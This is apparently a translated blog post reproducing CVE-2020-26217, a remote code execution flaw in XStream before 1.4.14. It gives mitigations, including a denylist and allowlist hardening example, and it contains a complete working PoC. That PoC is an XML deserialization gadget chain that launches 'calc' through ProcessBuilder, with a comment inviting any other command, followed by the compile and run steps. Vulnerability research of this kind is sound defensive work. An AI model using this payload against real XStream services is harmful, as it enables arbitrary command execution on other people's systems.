[Vulnerability Reproduction] CVE-2020-26217 | XStream Remote Code Execution Vulnerability

Preface

The affected range is XStream < 1.4.14. The minor (patch) releases also need the blacklist entry added, but during reproduction only all of the regular versions and the minor versions marked in red in the figure below reproduced successfully:

In addition, the XPP3 and xmlpull jars are required, and the vulnerability cannot be triggered under JDK 9.
During reproduction I found that versions 1.4.10 and above can be protected by enabling the default security configuration before calling fromXML:

import com.thoughtworks.xstream.XStream;

XStream xStream = new XStream();
XStream.setupDefaultSecurity(xStream);    // enable the default security configuration
String xml = "";                          // the XML document to deserialise
xStream.fromXML(xml);

This avoids the vulnerability; in testing it could not be triggered this way, so upgrading to 1.4.14 is not required.
Alternatively, adding the blacklist entry that was bypassed this time, javax.imageio.ImageIO$ContainsFilter, also provides temporary protection; see the Workaround section of the official advisory: http://x-stream.github.io/CVE-2020-26217.html
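As an added example (not code from the original post or from the XStream project), the two mitigations discussed above, the 1.4.10+ default denylist extended with the bypassed class and the allowlist form the advisory recommends, put into a small checker. The class HardenedXStream, its helper names and the two XML inputs are constructed for this example; the XStream API calls themselves are real.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import java.util.HashMap;

public class HardenedXStream {

    // Workaround for 1.4.10 - 1.4.13 (hypothetical helper name): keep the default
    // denylist and add the class this CVE abuses to bypass it.
    public static XStream withDenylist() {
        XStream xstream = new XStream();
        XStream.setupDefaultSecurity(xstream);   // only available from 1.4.10 on
        xstream.denyTypes(new String[] { "javax.imageio.ImageIO$ContainsFilter" });
        return xstream;
    }

    // Recommended form: drop every permission and allow only the types the
    // application actually expects, so unexpected gadget classes are never instantiated.
    public static XStream withAllowlist() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);             // start from "nothing allowed"
        xstream.allowTypes(new Class[] { String.class, HashMap.class });
        return xstream;
    }

    // True when the security framework refused a type anywhere in the document.
    // Refusals inside nested elements are wrapped in a ConversionException, hence the cause walk.
    public static boolean isRejected(XStream xstream, String xml) {
        try {
            xstream.fromXML(xml);
            return false;
        } catch (XStreamException e) {
            for (Throwable t = e; t != null; t = t.getCause()) {
                if (t instanceof ForbiddenClassException) return true;
            }
            throw e;   // a different unmarshalling problem: surface it
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a plain string map, and the same map carrying a
        // reference to the class the PoC relies on.
        String benign = "<map><entry><string>k</string><string>v</string></entry></map>";
        String hostile = "<map><entry><string>k</string>"
                + "<filter class='javax.imageio.ImageIO$ContainsFilter'/></entry></map>";
        for (XStream xs : new XStream[] { withDenylist(), withAllowlist() }) {
            System.out.println("benign rejected: " + isRejected(xs, benign)
                    + ", hostile rejected: " + isRejected(xs, hostile));
        }
    }
}
```

Both instances accept the benign map and reject the document naming the denied class; with the allowlist the same rejection happens for any class not explicitly listed, which is why it also covers future denylist bypasses.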

Environment

1. XStream Core
<!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.9</version>
</dependency>

2. XPP3
<!-- https://mvnrepository.com/artifact/org.ogce/xpp3 -->
<dependency>
    <groupId>org.ogce</groupId>
    <artifactId>xpp3</artifactId>
    <version>1.1.6</version>
</dependency>

3. xmlpull
<!-- https://mvnrepository.com/artifact/xmlpull/xmlpull -->
<dependency>
    <groupId>xmlpull</groupId>
    <artifactId>xmlpull</artifactId>
    <version>1.1.3.1</version>
</dependency>

Write a test PoC following the official advisory:

import com.thoughtworks.xstream.XStream;

public class vultest {
    public static void main(String[] args) {
        XStream xStream = new XStream();
        //XStream.setupDefaultSecurity(xStream);
        String xml = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='java.io.SequenceInputStream'>\n" +
                "              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
                "                <iterator class='javax.imageio.spi.FilterIterator'>\n" +
                "                  <iter class='java.util.ArrayList$Itr'>\n" +
                "                    <cursor>0</cursor>\n" +
                "                    <lastRet>-1</lastRet>\n" +
                "                    <expectedModCount>1</expectedModCount>\n" +
                "                    <outer-class>\n" +
                "                      <java.lang.ProcessBuilder>\n" +
                "                        <command>\n" +
                "                          <string>calc</string>\n" + // change this string to the command ProcessBuilder executes; calc is used as the example here
                "                        </command>\n" +
                "                      </java.lang.ProcessBuilder>\n" +
                "                    </outer-class>\n" +
                "                  </iter>\n" +
                "                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
                "                    <method>\n" +
                "                      <class>java.lang.ProcessBuilder</class>\n" +
                "                      <name>start</name>\n" +
                "                      <parameter-types/>\n" +
                "                    </method>\n" +
                "                    <name>start</name>\n" +
                "                  </filter>\n" +
                "                  <next/>\n" +
                "                </iterator>\n" +
                "                <type>KEYS</type>\n" +
                "              </e>\n" +
                "              <in class='java.io.ByteArrayInputStream'>\n" +
                "                <buf></buf>\n" +
                "                <pos>0</pos>\n" +
                "                <mark>0</mark>\n" +
                "                <count>0</count>\n" +
                "              </in>\n" +
                "            </is>\n" +
                "            <consumed>false</consumed>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";
        //final Iterator<?> iterator = (Iterator<?>) xStream.fromXML(xml);
        //iterator.hasNext();
        xStream.fromXML(xml);
    }

}

Reproduction

1. Compile the PoC above:
javac -cp xstream-1.4.13.jar vultest.java
2. Run it to verify:
"C:\Program Files\Java\jre1.8.0_231\bin\java.exe" -classpath .;xstream-1.4.13.jar;xmlpull-1.1.3.1.jar;xpp3-1.1.6.jar vultest    # could not be triggered under JDK 9 in testing; 1.8 works, so 1.8 is used for verification

References

[1]https://x-stream.github.io/CVE-2020-26217.html

Original post: https://www.cnblogs.com/303donatello/p/13998245.html